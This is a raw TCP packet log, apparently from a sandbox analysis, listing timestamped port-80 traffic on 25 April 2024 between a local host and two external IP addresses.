Apr 25, 2024 12:16:10.795528889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795556068 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795566082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795583010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795599937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795599937 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795617104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795636892 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795655012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795660973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795692921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795710087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795727968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795758963 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795758963 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795804977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795821905 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795839071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795870066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795895100 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795902014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795919895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795932055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.796021938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.796037912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.796055079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.796070099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.796071053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.796087980 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.796113968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.796116114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.796116114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.796233892 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.837449074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.877135038 CEST	80	49734	185.172.128.76	192.168.2.4
Apr 25, 2024 12:16:10.880096912 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.991630077 CEST	80	49734	185.172.128.76	192.168.2.4
Apr 25, 2024 12:16:10.991650105 CEST	80	49734	185.172.128.76	192.168.2.4
Apr 25, 2024 12:16:10.991735935 CEST	49734	80	192.168.2.4	185.172.128.76
Apr 25, 2024 12:16:10.993328094 CEST	49734	80	192.168.2.4	185.172.128.76
Apr 25, 2024 12:16:11.020914078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.020931959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.020944118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.020962954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.020976067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.020987988 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.020999908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.021013021 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.021024942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.021038055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.021050930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.021061897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.021073103 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.021075010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.021209955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.021209955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.021398067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.021764994 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.021878958 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.022422075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.022770882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.022842884 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.023142099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.023205042 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.023328066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.023340940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.023355007 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.023371935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.023406982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.023453951 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.023669958 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.023683071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.023720026 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.024075031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024090052 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024111986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024173021 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.024245977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024257898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024270058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024329901 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.024329901 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.024516106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024529934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024542093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024554968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024606943 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.024606943 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.024687052 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024699926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024857998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024871111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024880886 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.024882078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024894953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024909019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.024919033 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.024957895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.025038004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025051117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025063038 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025077105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025136948 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.025206089 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025219917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025230885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025245905 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025259018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025279045 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.025300026 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.025322914 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.025335073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025515079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025527954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025540113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025552034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025564909 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025583029 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.025646925 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.025697947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025712967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025727034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025738955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025804043 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.025804043 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.025876045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025888920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.025901079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026057959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.026061058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026073933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026086092 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026149035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.026149035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.026226044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026237965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026249886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026262999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026274920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026292086 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.026331902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.026422024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026436090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026448011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026460886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026478052 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.026523113 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.026601076 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026613951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026626110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026642084 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026654005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026665926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026673079 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.026673079 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.026679039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026690960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026711941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026730061 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.026736021 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026746988 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.026750088 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026763916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.026763916 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.026809931 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.026927948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027081966 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.027097940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027112961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027124882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027137995 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027160883 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.027179003 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.027288914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027302027 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027313948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027326107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027338982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027350903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027353048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.027364016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.027431965 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.027525902 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027539015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027551889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027565002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027576923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027601957 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.027641058 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.027786016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027811050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027822018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027834892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027873039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.027873039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.027966022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.027992010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028003931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028016090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028027058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028038025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028043032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.028073072 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.028234005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028247118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028259993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028271914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028285027 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028291941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.028398037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028410912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028424025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028435946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028438091 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.028438091 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.028449059 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028490067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.028490067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.028577089 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028590918 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028603077 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028614998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028661013 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028672934 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.028672934 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.028737068 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.028856039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028868914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028881073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.028934956 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.029211998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029227018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029237986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029251099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029263020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029274940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029289961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029309988 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.029309988 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.029349089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.029350996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029365063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029376030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029387951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029400110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029448032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.029470921 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.029556990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029570103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029582977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029597998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029609919 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029623985 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029639959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.029664040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.029680014 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.029743910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029756069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029768944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029829979 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.029850960 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.029918909 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029932022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029944897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.029984951 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.030081987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030093908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030142069 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.030287027 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030299902 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030312061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030324936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030337095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030347109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.030349016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030380011 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.030419111 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.030441999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030455112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030467987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030478954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030498028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030555010 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.030555010 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.030644894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030733109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030745029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030757904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030774117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030786991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030793905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.030800104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030833960 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.030868053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030881882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030894041 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.030944109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.031069994 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.031219006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031232119 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031244040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031255960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031267881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031280994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031326056 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.031326056 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.031375885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031388998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031402111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031440020 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.031563997 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031583071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031594992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031606913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031619072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031620026 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.031632900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031670094 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.031670094 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.031704903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031718016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031765938 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.031884909 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031898975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031910896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031923056 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031938076 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.031964064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.031964064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.031992912 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.032138109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.032151937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.032162905 CEST	80	49733	176.97.76.106	192.168.2.4
